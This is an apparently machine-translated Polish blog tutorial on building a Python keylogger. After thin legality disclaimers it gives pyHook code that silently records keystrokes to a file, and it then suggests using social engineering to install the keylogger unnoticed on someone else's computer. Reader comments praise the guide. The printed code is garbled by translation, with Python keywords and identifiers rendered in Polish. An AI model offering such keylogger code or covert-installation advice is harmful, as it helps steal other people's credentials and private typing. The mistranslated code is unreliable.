włamanieprogramowanieRekomendacjetechnologia

Jak stworzyć Keylogger

Zanim zacznę, muszę to wyjaśnić KEYLOGGER jest nielegalny, jeśli jego użycie jest wykorzystywane w przestępstwach, na przykład uzyskać dane i poświadczenia kogoś. Ten artykuł jest przeznaczony wyłącznie do celów szkoleniowych i akademickich, abyś zrozumiał, jak to działa.

Legalne użycie keyloggera

Jeśli chcesz zatrudnić keylogger kontroli rodzicielskiej Aby legalnie kontrolować przeglądanie przez Twoje dzieci, zalecamy następujące czynności. Następnie Musisz upewnić się, że masz zgodę swoich dzieci i że są one świadome, że korzystasz z oprogramowania monitorującego. Sprawdź ustawodawstwo w swoim kraju.

Co to jest keylogger?

Keylogger to złośliwe oprogramowanie szeroko stosowane w świecie hakerów. Ten malware pozwala nam rejestrować wszystkie treści wprowadzane na klawiaturze osoby korzystającej z urządzenia.

Jest to bardzo niebezpieczne, ponieważ może rejestrować wszystkie rodzaje danych uwierzytelniających, w tym dane uwierzytelniające bankowe lub inne aplikacje, które są używane, gdy oprogramowanie jest aktywne.

To złośliwe oprogramowanie jest dość skomplikowane w obsłudze zdalnej, musisz mieć dużą wiedzę na jego temat. Ale my cię nauczymy utwórz Keyloggera którego możesz użyć na swoim lokalnym komputerze, aby z pierwszej ręki zobaczyć, jak to działa.

UWAŻAJ! Jeśli to nie jest Twój komputer osobisty, w końcu się zarejestrujesz referencje twojego partnera, rodzina u inni ludzie jeśli robisz to na swoim lub jeśli mają dostęp do twojego komputera. Jest to nielegalne, jeśli nie masz wyraźnej zgody i powinieneś zostać powiadomiony, że rejestrujesz ich dane.

Zbudowanie własnego Keyloggera pozwoli nam używać go na naszym komputerze do zapisywania wszystkich dokonanych zapisów klawiatury. Również po to, aby mieć pewność, że nikt nie korzysta z naszego sprzętu bez uprzedniej zgody.

W każdym razie zostawimy Ci bardziej wyjaśniający post na temat tego, czym jest Keylogger i jego zastosowanie.:

Jak stworzyć Keylogger

Aby kontynuować będziemy potrzebować użycia Python 2.7, Pyhook lub Pywin32 albo nie będziemy w stanie sprawić, by Skrypt, który zamierzamy stworzyć, zadziałał.

Aby pobrać Pythona, możesz to zrobić z ten link, zajmie to tylko kilka minut.

Pierwszą rzeczą, którą będziemy musieli zrobić, aby rozpocząć tworzenie Keywloggera, jest otwarcie edytora Pythona.

Wewnątrz naszego pustego dokumentu wprowadzimy następujący kod:

Darmowy kod keyloggera


import pyHook, pythoncom, sys, logowanie
# możesz ustawić plik file_log na inną nazwę / lokalizację pliku

def OnKeyboardEvent (zdarzenie):
logging.basicConfig (filename = file_log, level = logging.DEBUG, format = '% (message) s')
chr (event.Ascii)
logowanie.log (10, chr (event.Ascii))
powrót True
hooks_manager = pyHook.HookManager ()
hooks_manager.KeyDown = Zdarzenie OnKeyboard
hooks_manager.HookKeyboard ()
pythoncom.PumpMessages ()

Po skopiowaniu i wklejeniu zamierzamy kliknąć Zapisz. Ważne jest, abyśmy go zapisali wraz z rozszerzeniem .pyw. Trzymanie pliku w ten sposób "Keylogger.pyw".

Dobrze. Mamy Keyloggera gotowego do rejestrowania ruchów klawiatury i rozpoczęcia szpiegowania korzystania z naszego komputera. Za pomocą tego kodu naciśnięcia klawiszy zostaną zapisane w osobnym pliku.

Cóż, zacznijmy nasz nowy Skrypt. Wystarczy, że klikniesz dwukrotnie plik, a automatycznie rozpoczniemy rejestrowanie całej aktywności.

Gdy chcemy wyłączyć Keylogger, wystarczy otworzyć menedżera zadań (Control + Alt + Del) i zakończyć proces Pythona. Więc wyłączymy to na siłę.

zakończ Pythona z menedżerem zadań. Napisz, jak stworzyć keyloggera
citeia.com

Teraz czas na zabawną część. Po zakończeniu procesu przejdziemy do pliku „keyloggeroutput.txt”. Znajdziemy go w tym samym katalogu, w którym trzymamy Keylogger. Dwukrotnie klikniemy to i….

Tachán!

Posiadamy rejestr wszystkich zastosowań klawiatury zarejestrowany na naszym komputerze od czasu, gdy Keylogger był aktywny. Już się nauczyłeś jak stworzyć Keylogger na komputerze i wykonaj pewne testy.

Porozmawiamy teraz o tym, że Twój komputer jest w jakikolwiek sposób zainfekowany wirusem tego typu. W rzeczywistości poniżej pozostawimy jeden ze sposobów, w jaki Keylogger może zostać wszczepiony do komputera danej osoby, zalecamy jego przeczytanie.

Załóżmy teraz, że podejrzewasz, że masz zainstalowany Keylogger na swoim komputerze i widzisz dziwną aktywność, więc nie martw się. Pokazaliśmy już, jak go wykryć i usunąć ręcznie. Istnieje jednak kilka programów i aplikacji, które automatycznie wykrywają i eliminują Keylogger z komputera, poznaj je w tym poście, który zostawiamy tutaj:

Jeśli jesteś zainteresowany tego typu narzędziem, zostaw komentarz, aby zdecydować, jakie jest następne.

Gdybyś chciał w niezauważony sposób umieścić Keylogger na czyimś komputerze, możesz to łatwo zrobić za pomocą socjotechniki.

socjotechnika i sztuczki psychologiczne

Inżynieria społeczna pozwala wejść w czyjeś sposób myślenia za pomocą zbioru informacji o ofierze w celu zaplanowania i przeprowadzenia skutecznego ataku na użytkownika.

Jest to jedna z metod, za pomocą których można uzupełnić każdą strategię hakerską (chociaż jest używana nie tylko w hakowaniu)

Jeśli chcesz się dowiedzieć jak zastosować inżynierię społeczną w hakowaniu Polecam zapoznać się z następującym artykułem.

Czy można hakować ludzi? Inżynieria społeczna

inżynieria społeczna
citeia.com

Możesz także pobrać wersję w formacie PDF za darmo. (14 stron do użytku akademickiego)

Możesz również bezpłatnie pobrać plik PDF w formacie magazynu, aby przeczytać go później.

Sztuka okładki książki o inżynierii społecznej
PDF DO POBRANIA: #1 Inżynieria społeczna dla hakerów

Mamy nadzieję, że było to dla Ciebie przydatne.

Może Cię zainteresować: Skąd mam wiedzieć, czy mój e-mail został zhakowany?

Komentarzy 7

  1. Bardzo dobry artykuł, to pierwsza strona internetowa, która wyjaśnia mi bez objazdów, jak stworzyć keyloggera ... Dzięki, że nie wkładasz słomy bestii, jak to robi ostatnio większość stron internetowych, czy tylko ja się męczy?

    pozdrowienia

  2. Konto Google mojego brata zostało zhakowane i chciałbym nauczyć się tej sztuki sprawdzania, ponieważ smutno mi, gdy widzę go smutnego, proszę

Zostaw odpowiedź

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Ta strona używa Akismet do redukcji spamu. Dowiedz się, jak przetwarzane są dane komentarza.